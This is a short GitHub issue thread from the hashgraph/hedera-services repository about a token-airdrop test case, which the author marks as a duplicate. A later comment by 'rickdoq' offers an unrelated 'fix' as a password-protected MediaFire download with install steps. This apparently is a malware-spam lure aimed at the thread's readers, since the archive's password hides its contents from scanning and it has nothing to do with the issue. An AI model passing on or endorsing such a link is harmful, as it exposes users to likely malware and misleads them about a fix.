### ISSUE TITLE
(AIRDROP_TO_CONTRACT_34) 1. TokenAirdropTransaction to a hollow account with maxAutoAssociations ≠ -1. 2. CREATE2 a contract on an address with a hollow account with maxAutoAssociations ≠ -1

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15249]

**Comment by vtronkov** [comment]
Duplicated https://github.com/hashgraph/hedera-services/issues/15278

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
